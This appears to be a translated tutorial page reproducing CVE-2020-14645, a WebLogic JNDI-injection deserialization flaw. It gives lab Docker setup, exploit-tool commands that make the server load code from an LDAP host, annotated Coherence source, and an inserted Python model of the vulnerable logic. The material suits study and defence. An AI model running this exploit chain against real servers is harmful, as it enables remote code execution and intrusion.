2025-04-04 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
Today I will walk you through the analysis of the WebLogic UniversalExtractor deserialization vulnerability CVE-2020-14645, which many people may not understand well. To make it easier to follow, the editor has summarized the content below; I hope you will get something out of this article.
1.1 Status
Completed: analysis of the vulnerability mining conditions and reproduction of the vulnerability.
1.2 Introduction
WebLogic is the Java application server of Oracle Corporation (USA). It is middleware used for the integrated development and deployment of web applications, database applications and so on. WebLogic's T3 protocol is easy to abuse, so JNDI injection combined with deserialization is used to achieve remote code execution. Affected version: WebLogic 12.2.1.4.x, with JDK versions below 6u211, below 7u201 and below 8u191. JDK 1.8.0_181 is used in this article.
1.3 Vulnerability mining capability conditions
You should have mastered the method of JNDI injection and be clear about the logic of the coherence source code shipped with WebLogic.
1.4 Usage
1.4.1 Environment
Under WSL2 on Windows 10, use the docker image weblogic122140jdk8u181new:latest and an ubuntu image to create three containers, named weblogic122140jdk8u181new, ubuntu-JNDI and ubuntu-gongji, which act as the WebLogic server, the JNDI server and the attack machine respectively. To generate the weblogic122140jdk8u181new container [ip:172.17.0.2], enter the [WeblogicEnvironment] folder and follow the method at [https://github.com/QAX-A-Team/WeblogicEnvironment]. The commands are as follows:
docker build --build-arg JDK_PKG=jdk-8u181-linux-x64.tar.gz --build-arg WEBLOGIC_JAR=fmw_12.2.1.4.0_wls_lite_generic.jar -t weblogic122140jdk8u181new .
docker run -d -p 7001:7001 -p 8453:8453 -p 5556:5556 --name weblogic122140jdk8u181new weblogic122140jdk8u181new
For the ubuntu-JNDI container [ip:172.17.0.3], generated from the ubuntu image, copy jdk-8u181-linux-x64.tar.gz and JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar into the container, install the JDK according to [https://www.cnblogs.com/hellojesson/p/11684299.html], and execute the command:
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "touch /tmp/CVE" -A 172.17.0.3
For the ubuntu-gongji container [ip:172.17.0.4], also generated from the ubuntu image, copy jdk-8u181-linux-x64.tar.gz and CVE-2020-14645.jar into the container and install the JDK by referring to [https://www.cnblogs.com/hellojesson/p/11684299.html].
1.4.2 Target
Execute the code [touch /tmp/CVE] on the WebLogic server so that the CVE file is generated under the tmp folder.
1.4.3 Steps
Recreating the ubuntu-JNDI container outputs the available LDAP links. The output is as follows:
Enter the forwarding command in the attack machine container ubuntu-gongji as follows:
Note that the tail of the LDAP link (the part marked in red) is randomly generated and differs each time. After the code executes, the generated file appears in the weblogic122140jdk8u181new container:
1.4.4 Analysis method
[Part of the code analysis is omitted.] When the program runs, it jumps into the coherence library (red box below) to perform some functions.
In the com.tangosol.util.extractor.UniversalExtractor class, the com.tangosol.util.extractor.UniversalExtractor#extractComplex method, reached from extract, contains the following (the comments in [] are the author's annotations):

```java
Class clzTarget = oTarget.getClass();
Class[] clzParam = ClassHelper.getClassArray(aoParam);
String sCName = this.getCanonicalName();          // [no-argument function name, or null]
boolean fProperty = this.isPropertyExtractor();
Method method = null;
if (fProperty) {                                   // [the only condition under which a Method object is obtained]
    String sBeanAttribute = Character.toUpperCase(sCName.charAt(0)) + sCName.substring(1);   // [capitalise the first letter]
    for (int cchPrefix = 0; cchPrefix < BEAN_ACCESSOR_PREFIXES.length && method == null; ++cchPrefix) {
        // [looks up the new name built from get/is + the attribute string]
        // [ClassHelper.findMethod finds the method matching the given class, method name and parameters]
        // [the target method must start with "get" or "is" and take no arguments]
        method = ClassHelper.findMethod(clzTarget, BEAN_ACCESSOR_PREFIXES[cchPrefix] + sBeanAttribute, clzParam, false);
    }
} else {
    method = ClassHelper.findMethod(clzTarget, this.getMethodName(), clzParam, false);
}
```

At first glance, entering the else branch would allow calling an arbitrary method, provided fProperty is false. On investigation, fProperty is determined by !this.m_fMethod, which is assigned in the init() function as follows:

```java
protected void init() {
    String sCName = this.getCanonicalName();
    this.m_fMethod = sCName == null || sCName.endsWith("()");   // [satisfied when sCName is a no-argument function]
}
```

As for fProperty: when sCName is non-null and is not a no-argument function, fProperty is true. Continuing from String sCName = this.getCanonicalName();, this traces back to the method com.oracle.common.internal.util.CanonicalNames#computeValueExtractorCanonicalName(java.lang.String, java.lang.Object[]) of class com.oracle.common.internal.util.CanonicalNames:

```java
public static String computeValueExtractorCanonicalName(String sName, Object[] aoParam) {
    // [this method requires the function to take no parameters]
    int nMethodSuffixLength = "()".length();
    if (aoParam != null && aoParam.length > 0) {
        return null;                                // [returns null when there are parameters]
    } else if (!sName.endsWith("()")) {
        return sName;                               // [name does not end with "()": return it unchanged]
    } else {
        String sNameCanonical = sName;
        int nNameLength = sName.length();
        String[] var5 = VALUE_EXTRACTOR_BEAN_ACCESSOR_PREFIXES;   // ["get", "is"]
        int var6 = var5.length;
        for (int var7 = 0; var7 < var6; ++var7) {
            String sPrefix = var5[var7];
            int nPrefixLength = sPrefix.length();
            if (nNameLength > nPrefixLength && sName.startsWith(sPrefix)) {
                // [name starts with "get" / "is": lower-case the next character and strip the trailing "()"]
                sNameCanonical = Character.toLowerCase(sName.charAt(nPrefixLength)) + sName.substring(nPrefixLength + 1, nNameLength - nMethodSuffixLength);
                break;
            }
        }
        return sNameCanonical;
    }
}
```
To sum up, there are three approaches.
Method 1: look for a method name that starts with "get" / "is". [chances are slim]
Method 2: if fProperty is false, look for a no-parameter method that starts with "get" / "is". [chances are slim]
Method 3: observe that extract is called twice in the compare function, which causes some values to change and may lead to defects. [validated, invalid]
For method 1, find a method name that meets the conditions, then find a serializable object that exposes it; for example, if dataSource can be controlled, javax.sql.rowset.BaseRowSet#getDataSourceName can be controlled to perform JNDI injection.
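As an added example (not Coherence code and not the author's), here is a Python model of the name-gating logic quoted above: for a given extractor name and parameter list it reports the canonical name, m_fMethod, fProperty and which method names findMethod would then be asked for, so the "get"/"is" condition behind methods 1 and 2 can be checked against candidates such as getDataSourceName. Its getMethodName() behaviour (stripping the "()" suffix) is an assumption, since that method is not shown on the page.

```python
# Added example: Python model of the UniversalExtractor name gating
# (computeValueExtractorCanonicalName, init(), extractComplex). Not Coherence code.
BEAN_ACCESSOR_PREFIXES = ("get", "is")   # VALUE_EXTRACTOR_BEAN_ACCESSOR_PREFIXES
METHOD_SUFFIX = "()"


def compute_canonical_name(name, params):
    """Mirror of CanonicalNames#computeValueExtractorCanonicalName."""
    if params:                                  # any argument: no canonical name
        return None
    if not name.endswith(METHOD_SUFFIX):
        return name                             # plain property name, unchanged
    canonical = name
    for prefix in BEAN_ACCESSOR_PREFIXES:
        if len(name) > len(prefix) and name.startswith(prefix):
            attr = name[len(prefix):len(name) - len(METHOD_SUFFIX)]
            if attr:                            # bare "get()" would index past the end in Java
                canonical = attr[0].lower() + attr[1:]
            break
    return canonical


def resolve(name, params=()):
    """Return (canonical name, m_fMethod, fProperty, names findMethod is asked for)."""
    canonical = compute_canonical_name(name, params)
    f_method = canonical is None or canonical.endswith(METHOD_SUFFIX)   # init()
    f_property = not f_method                                           # isPropertyExtractor()
    if f_property:
        # property branch of extractComplex: try get<Attr>, then is<Attr>
        bean_attr = canonical[0].upper() + canonical[1:]
        candidates = [p + bean_attr for p in BEAN_ACCESSOR_PREFIXES]
    else:
        # else branch: getMethodName(); ASSUMED here to strip the "()" suffix
        base = name[:-len(METHOD_SUFFIX)] if name.endswith(METHOD_SUFFIX) else name
        candidates = [base]
    return canonical, f_method, f_property, candidates


if __name__ == "__main__":
    for spec in [("getDataSourceName()", ()), ("dataSourceName", ()),
                 ("toString()", ()), ("getUrl()", ("x",))]:
        print(spec, "->", resolve(*spec))
```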
1.5 Patch Analysis
Not yet.
1.6 Docker reproduction
Load the container tar as an image, for example:
cat ./ubuntu-xxx.tar | docker import - ubuntu-new
Set up the local network and container IPs, then start the container. For example:
(1) Custom network
docker network create --subnet=192.168.10.1/24 testnet
(2) Start the docker container
docker run -p 8088:8088 -p 8081:8081 -it --hostname testt3 --network testnet --ip 10.10.10.100 ubuntuxxx:xxx /bin/bash
Start the WebLogic service. Here the IP of container [ubuntu-JNDI1106] is 172.17.0.3, the IP of container [ubuntu-gongji1106] is 172.17.0.5, and the IP of container [weblogic122140jdk8u181new1106] is 172.17.0.4. Enter the container [weblogic122140jdk8u181new1106] and run:
sh /u01/app/oracle/Domains/ExampleSilentWTDomain/bin/startWebLogic.sh
It starts successfully, as shown in the figure below.
Start the JNDI service. Enter the container [ubuntu-JNDI1106] and run the following commands in turn:
source /etc/profile
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "touch /tmp/CVE110667" -A 172.17.0.3
You can see that the JNDI access link for jdk1.8 is [ldap://172.17.0.3:1389/usns1q], as shown below.
Launch the attack. Enter the container [ubuntu-gongji1106] and run the following commands in turn:
source /etc/profile
java -jar CVE-2020-14645.jar 172.17.0.3:1389/usns1q http://172.17.0.4:7001
The "172.17.0.3:1389/usns1q" part is the JNDI link. A successful attack returns the WebLogic version, as shown in the figure below.
After a successful attack, the container [ubuntu-JNDI1106] displays the transmission information, as shown below.
After a successful attack, the weblogic server generates a [CVE] file, as shown below.
After reading the above, do you have a better understanding of the analysis of the WebLogic UniversalExtractor deserialization vulnerability CVE-2020-14645? If you want to learn more, please follow the industry information channel. Thank you for your support.